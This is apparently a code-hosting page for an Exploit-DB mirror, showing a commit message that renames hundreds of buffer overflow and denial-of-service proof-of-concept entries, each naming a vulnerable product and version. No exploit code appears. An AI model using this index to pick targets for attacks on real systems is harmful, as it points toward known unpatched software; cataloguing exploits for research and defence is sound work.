bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/43460.py
Offensive Security 2d8b561a5d DB: 2018-01-09 
26 changes to exploits/shellcodes

Need for Speed 2 - Remote Client Buffer Overflow
Need for Speed 2 - Remote Client Buffer Overflow (PoC)

Red Faction 1.20 - Server Reply Remote Buffer Overflow
Red Faction 1.20 - Server Reply Remote Buffer Overflow (PoC)

Medal of Honor - Remote Buffer Overflow
Medal of Honor - Remote Buffer Overflow (PoC)

Monolith Games - Local Buffer Overflow
Monolith Games - Local Buffer Overflow (PoC)

BaSoMail - Multiple Buffer Overflow Denial of Service Vulnerabilities
BaSoMail - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities

Orbz Game 2.10 - Remote Buffer Overflow
Orbz Game 2.10 - Remote Buffer Overflow (PoC)

Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow
Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow (PoC)

KNet Web Server 1.04c - Buffer Overflow Denial of Service
KNet Web Server 1.04c - Buffer Overflow (Denial of Service) (PoC)

ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash
ProRat Server 1.9 (Fix-2) - Buffer Overflow / Crash (PoC)

Mozilla Products - 'Host:' Buffer Overflow Denial of Service String
Mozilla Products - 'Host:' Buffer Overflow (Denial of Service) (PoC) String

Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service
Virtools Web Player 3.0.0.100 - Buffer Overflow (Denial of Service) (PoC)

FlatFrag 0.3 - Buffer Overflow / Denial of Service
FlatFrag 0.3 - Buffer Overflow (Denial of Service) (PoC)

zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service
zawhttpd 0.8.23 - GET Remote Buffer Overflow (Denial of Service) (PoC)

TinyFTPD 1.4 - 'USER' Remote Buffer Overflow Denial of Service
TinyFTPD 1.4 - 'USER' Remote Buffer Overflow (Denial of Service) (PoC)

Genecys 0.2 - Buffer Overflow / NULL pointer Denial of Service
Genecys 0.2 - Buffer Overflow / NULL Pointer (Denial of Service)

PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow Denial of Service
PunkBuster < 1.229 - WebTool Service Remote Buffer Overflow (Denial of Service) (PoC)

FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service
FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow (Denial of Service) (PoC)

Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)

TFTP Server 1.3 - Remote Buffer Overflow Denial of Service
TFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC)

LeadTools Raster - Dialog File_D Object Remote Buffer Overflow
LeadTools Raster - Dialog File_D Object Remote Buffer Overflow (PoC)

LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow
LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)

Xserver 0.1 Alpha - POST Remote Buffer Overflow
Xserver 0.1 Alpha - 'POST' Remote Buffer Overflow (PoC)

Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow
Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow (PoC)

QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow
QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow (PoC)

Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow / Denial of Service
Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow (Denial of Service) (PoC)

Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service
Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow (Denial of Service) (PoC)

Google Picasa 3.5 - Local Buffer Overflow (Denial of Service)
Google Picasa 3.5 - Local Buffer Overflow (Denial of Service) (PoC)
Printoxx - Local Buffer Overflow
Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)
Printoxx - Local Buffer Overflow (PoC)
Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)

Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service
Apollo Player 37.0.0.0 - '.aap' Buffer Overflow (Denial of Service) (PoC)

Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service
Switch Sound File Converter - '.mpga' Buffer Overflow (Denial of Service) (PoC)
Wireshark 1.2.5 - LWRES getaddrbyname Stack Buffer Overflow
Xerox Workcenter 4150 - Remote Buffer Overflow
Wireshark 1.2.5 - 'LWRES getaddrbyname' Stack Buffer Overflow (PoC)
Xerox Workcenter 4150 - Remote Buffer Overflow (PoC)

iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service
iPhone / iTouch FtpDisc 1.0 - Buffer Overflow (Denial of Service) (PoC)

Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow
Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow (PoC)
Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)
FontForge - '.BDF' Font File Stack Buffer Overflow
Mocha LPD 1.9 - Remote Buffer Overflow (Denial of Service) (PoC)
FontForge - '.BDF' Font File Stack Buffer Overflow (PoC)

Multiple Vendor AgentX++ - Stack Buffer Overflow
Multiple Vendor AgentX++ - Stack Buffer Overflow (PoC)

Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow
Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow (PoC)

Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow
Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow (PoC)

FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow
FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow (PoC)

LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow
LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow (PoC)

Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow
Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow (PoC)

Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow
Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow (PoC)

Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow
Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow (PoC)

Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)
Hanso Player 1.4.0.0 - 'Skinfile' Buffer Overflow (Denial of Service)
Real player 14.0.2.633 - Buffer Overflow / Denial of Service
GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service
Real player 14.0.2.633 - Buffer Overflow (Denial of Service) (PoC)
GOM Media Player 2.1.6.3499 - Buffer Overflow (Denial of Service) (PoC)

BulletProof FTP Client 2010 - Buffer Overflow
BulletProof FTP Client 2010 - Buffer Overflow (PoC)

KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (PoC)
KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)

Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows
Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows (PoC)

CSF Firewall - Buffer Overflow
CSF Firewall - Buffer Overflow (PoC)

Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH)
Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH) (PoC)

Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service
Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC)

Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)

Asterisk - 'ast_parse_digest()' Stack Buffer Overflow
Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC)

GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow
GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow (PoC)

Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow
Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow (PoC)

Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service
Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow (Denial of Service) (PoC)

Lattice Diamond Programmer 1.4.2 - Buffer Overflow
Lattice Diamond Programmer 1.4.2 - Buffer Overflow (PoC)
Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - Imapd Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - LDAP Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - IMonitor Buffer Overflow Denial of Service
Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service
Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0 - Imapd Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0 - LDAP Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0 - IMonitor Buffer Overflow (Denial of Service) (PoC)
Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow (Denial of Service) (PoC)

Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service
Netscape Enterprise Server 3.6 - SSL Buffer Overflow (Denial of Service) (PoC)

Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow
Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow (PoC)

Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service
Gene6 G6 FTP Server 2.0 - Buffer Overflow (Denial of Service) (PoC)

RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow
RedHat Linux 6.x - X Font Server Buffer Overflow (Denial of Service)

Computalynx CProxy Server 3.3 SP2 - Buffer Overflow Denial of Service
Computalynx CProxy Server 3.3 SP2 - Buffer Overflow (Denial of Service) (PoC)

Cerberus FTP Server 1.x - Buffer Overflow Denial of Service
Cerberus FTP Server 1.x - Buffer Overflow (Denial of Service) (PoC)

Microsoft SQL Server 2000 - SQLXML Buffer Overflow
Microsoft SQL Server 2000 - 'SQLXML' Buffer Overflow (PoC)

Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow
Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow (PoC)

Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow
Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow (PoC)

Hotfoon Dialer 4.0 - Buffer Overflow
Hotfoon Dialer 4.0 - Buffer Overflow (PoC)

IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service
IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)

Linksys Devices 1.42/1.43 - GET Buffer Overflow
Linksys Devices 1.42/1.43 - 'GET' Buffer Overflow (PoC)

iCal 3.7 - Remote Buffer Overflow
iCal 3.7 - Remote Buffer Overflow (PoC)

Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow
Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow (PoC)

Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow
Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow (PoC)

Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow
Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow (PoC)

Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow
Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow (PoC)

Zoner Photo Studio 15 b3 - Buffer Overflow
Zoner Photo Studio 15 b3 - Buffer Overflow (PoC)

Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow
Novell Netware Enterprise Web Server 5.1/6.0 - 'CGI2Perl.NLM' Buffer Overflow (PoC)

IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow
IBM U2 UniVerse 10.0.0.9 - 'uvrestore' Buffer Overflow (PoC)

Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow
Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow (PoC)

NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow
NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC)

myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow
myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow (PoC)

EffectOffice Server 2.6 - Remote Service Buffer Overflow
EffectOffice Server 2.6 - Remote Service Buffer Overflow (PoC)

Surfboard HTTPd 1.1.9 - Remote Buffer Overflow
Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC)

1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow
1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow (PoC)

Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow
Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow (PoC)

Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow
Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow (PoC)

Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow
Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)

DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow
DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow (PoC)

VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow
VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)

aGSM 2.35 Half-Life Server - Info Response Buffer Overflow
aGSM 2.35 Half-Life Server - Info Response Buffer Overflow (PoC)

cURL - Buffer Overflow
cURL - Buffer Overflow (PoC)

TagScanner 5.1 - Stack Buffer Overflow
TagScanner 5.1 - Stack Buffer Overflow (PoC)

Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow
Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow (PoC)

Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)

QwikMail 0.3 - HELO Command Buffer Overflow
QwikMail 0.3 - 'HELO' Buffer Overflow (PoC)

NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow
NullSoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow (PoC)

Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities
Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities (PoC)

Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow
Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow (PoC)

AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow
AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow (PoC)

Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service
Serva 32 TFTP 2.1.0 - Buffer Overflow (Denial of Service) (PoC)

Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow
Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow (PoC)

Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow
Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow (PoC)

PlanetDNS PlanetFileServer - Remote Buffer Overflow
PlanetDNS PlanetFileServer - Remote Buffer Overflow (PoC)

Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow
Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow (PoC)

Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow
Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow (PoC)

LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow
LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow (PoC)

VbsEdit 5.9.3 - '.smi' Buffer Overflow
VbsEdit 5.9.3 - '.smi' Buffer Overflow (PoC)

Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow
Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)

AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow
AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow (PoC)

DSocks 1.3 - 'Name' Buffer Overflow
DSocks 1.3 - 'Name' Buffer Overflow (PoC)

IcoFX 2.5.0.0 - '.ico' Buffer Overflow
IcoFX 2.5.0.0 - '.ico' Buffer Overflow (PoC)
Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow
Microsoft Windows XP - 'cmd.exe' Buffer Overflow
Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow (PoC)
Microsoft Windows XP - 'cmd.exe' Buffer Overflow (PoC)

Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities
Packeteer PacketShaper 8.0 - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities

Bochs 2.3 - Buffer Overflow / Denial of Service
Bochs 2.3 - Buffer Overflow (Denial of Service) (PoC)

Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow
Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow (PoC)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (1)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (2)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1)
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2)

T1lib - intT1_Env_GetCompletePath Buffer Overflow
T1lib - 'intT1_Env_GetCompletePath' Buffer Overflow (PoC)

Foxmail Email Client 6.5 - 'mailto' Buffer Overflow
Foxmail Email Client 6.5 - 'mailto' Buffer Overflow (PoC)
Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow
Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow Denial of Service
Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow (PoC)
Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow (Denial of Service) (PoC)

Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow
Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow (PoC)

Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow
Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow (PoC)

MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow
MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow (PoC)

MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow
MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow (PoC)

Trend Micro OfficeScan - Buffer Overflow / Denial of Service
Trend Micro OfficeScan - Buffer Overflow (Denial of Service) (PoC)

ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow
ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow (PoC)

Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow
Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow (PoC)

Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow
Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow (PoC)

NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow
NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow (PoC)

ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow
ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow (PoC)

A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow
A10 Networks ACOS 2.7.0-P2 (Build 53) - Buffer Overflow (PoC)

Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow
Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow (PoC)

Jzip - Buffer Overflow (SEH Unicode) (Denial of Service)
Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)

Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow
Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow (PoC)

BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow
BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow (PoC)

Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow
Adobe Flash Player 10.0.22 / AIR - URI Parsing Heap Buffer Overflow (PoC)

Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow
Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow (PoC)

Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow
Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow (PoC)

Xerox WorkCentre - PJL Daemon Buffer Overflow
Xerox WorkCentre - PJL Daemon Buffer Overflow (PoC)

Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow
Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow (PoC)

Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow
Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow (PoC)

Mocha W32 LPD 1.9 - Remote Buffer Overflow
Mocha W32 LPD 1.9 - Remote Buffer Overflow (PoC)

Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)

BulletProof FTP Client 2010 - Buffer Overflow (SEH)
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)

Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow
Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow (PoC)

D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow
D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC)

HTML Help Workshop 1.4 - Buffer Overflow (SEH)
HTML Help Workshop 1.4 - Buffer Overflow (SEH) (PoC)

Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite

TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow
TRENDnet SecurView Wireless Network Camera TV-IP422WN - 'UltraCamX.ocx' Stack Buffer Overflow (PoC)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)

G-WAN 2.10.6 - Buffer Overflow / Denial of Service
G-WAN 2.10.6 - Buffer Overflow (Denial of Service) (PoC)

Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service
Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow (Denial of Service) (PoC)

TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow
TestDisk 6.14 - 'Check_OS2MB' Stack Buffer Overflow (PoC)

ZOC SSH Client - Buffer Overflow (SEH)
ZOC SSH Client - Buffer Overflow (SEH) (PoC)

WebDrive 12.2 (B4172) - Buffer Overflow
WebDrive 12.2 (B4172) - Buffer Overflow (PoC)

PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH)
PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH) (PoC)

Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow
Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow (PoC)
IKEView.exe Fox Beta 1 - Stack Buffer Overflow
IKEView.exe R60 - Stack Buffer Overflow
IKEView.exe Fox Beta 1 - Stack Buffer Overflow (PoC)
IKEView.exe R60 - Stack Buffer Overflow (PoC)

Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow
Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow (PoC)

Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow
Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow (PoC)
LanSpy 2.0.0.155 - Buffer Overflow
LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow
Last PassBroker 3.2.16 - Stack Buffer Overflow
LanSpy 2.0.0.155 - Buffer Overflow (PoC)
LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow (PoC)
Last PassBroker 3.2.16 - Stack Buffer Overflow (PoC)

Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow
Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow (PoC)
TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)
TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow
TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow
TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH) (PoC)
TECO TP3-PCLINK 2.1 - '.tpc' Handling Buffer Overflow (PoC)
TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow (PoC)
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - '_FXCLI_SetConfFileChunk' Stack Buffer Overflow (PoC)
IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - '_FXCLI_GetConfFileChunk' Stack Buffer Overflow (PoC)

Advanced Encryption Package Buffer Overflow - Denial of Service
Advanced Encryption Package - Buffer Overflow (Denial of Service) (PoC)

InfraRecorder - '.m3u' File Buffer Overflow
InfraRecorder - '.m3u' File Buffer Overflow (PoC)

Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution
Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution (PoC)
Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow
yTree 1.94-1.1 - Local Buffer Overflow
Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow (PoC)
yTree 1.94-1.1 - Local Buffer Overflow (PoC)

NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow
NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow (PoC)

CyberCop Scanner Smbgrind 5.5 - Buffer Overflow
CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC)
STIMS Buffer 1.1.20 - Buffer Overflow (SEH) (Denial of Service)
STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service
STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)
STIMS Cutter 1.1.3.20 - Buffer Overflow (Denial of Service) (PoC)

4digits 1.1.4 - Local Buffer Overflow
4digits 1.1.4 - Local Buffer Overflow (PoC)

Websockify (C Implementation) 0.8.0 - Buffer Overflow
Websockify (C Implementation) 0.8.0 - Buffer Overflow (PoC)

Google Android - '/system/bin/sdcard' Stack Buffer Overflow
Google Android - '/system/bin/sdcard' Stack Buffer Overflow (PoC)

Oracle Orakill.exe 11.2.0 - Buffer Overflow
Oracle Orakill.exe 11.2.0 - Buffer Overflow (PoC)

Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow
Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow (PoC)
Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow
Core FTP LE 2.2 - Path Field Local Buffer Overflow
Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow (PoC)
Core FTP LE 2.2 - Path Field Local Buffer Overflow (PoC)

Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow
Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC)

